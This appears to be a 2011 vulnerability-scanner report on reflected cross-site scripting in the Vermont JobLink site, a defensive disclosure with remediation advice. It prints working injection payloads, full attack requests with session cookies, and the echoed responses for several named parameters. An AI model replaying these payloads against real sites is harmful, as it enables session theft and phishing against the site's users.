Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; &quot; &#x27; &#x3d; etc). Because this issue reflects input inside a double-quoted attribute value, encoding the double quote is what prevents the payload from breaking out of the attribute.
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b was submitted in the url parameter. This input was echoed as a8d7a"style="x:expression(alert(1))"0a17ee4770b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2Fa8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
<a href="http://www.act.org/certificate/a8d7a"style="x:expression(alert(1))"0a17ee4770b" target="_blank">
...[SNIP]...
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3251d"style%3d"x%3aexpression(alert(1))"958bb28727d was submitted in the rand parameter. This input was echoed as 3251d"style="x:expression(alert(1))"958bb28727d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/mn_eligibility_dsp.cfm?rand=1688523251d"style%3d"x%3aexpression(alert(1))"958bb28727d HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the BLTEXTBOXEXTRADONOTUSE1_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691 was submitted in the BLTEXTBOXEXTRADONOTUSE1_prev parameter. This input was echoed as c5253"style="x:expression(alert(1))"6a3bba82691 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:02'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the CFTEXTBOXEXTRADONOTUSE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70 was submitted in the CFTEXTBOXEXTRADONOTUSE_prev parameter. This input was echoed as a8487"style="x:expression(alert(1))"a92543e7b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the ERRORFIELDS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17 was submitted in the ERRORFIELDS parameter. This input was echoed as b6034"style="x:expression(alert(1))"b3d03e576d5baaa17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuseridb6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the FORMID_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41 was submitted in the FORMID_prev parameter. This input was echoed as 8d2b5"style="x:expression(alert(1))"372f5e60b41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:08'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the FORMNAME_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98 was submitted in the FORMNAME_prev parameter. This input was echoed as a32fd"style="x:expression(alert(1))"645ffa01d98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:51'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bdc"><a>d414acd7200 was submitted in the FormID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=1050bdc"><a>d414acd7200&rand=887277&choice=1">
...[SNIP]...
The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313 was submitted in the FormName parameter. This input was echoed as 2bbf0"style="x:expression(alert(1))"34e6cd92313 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 was submitted in the FormName parameter. This input was echoed as ed897"style="x:expression(alert(1))"6af9926f561ad08f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
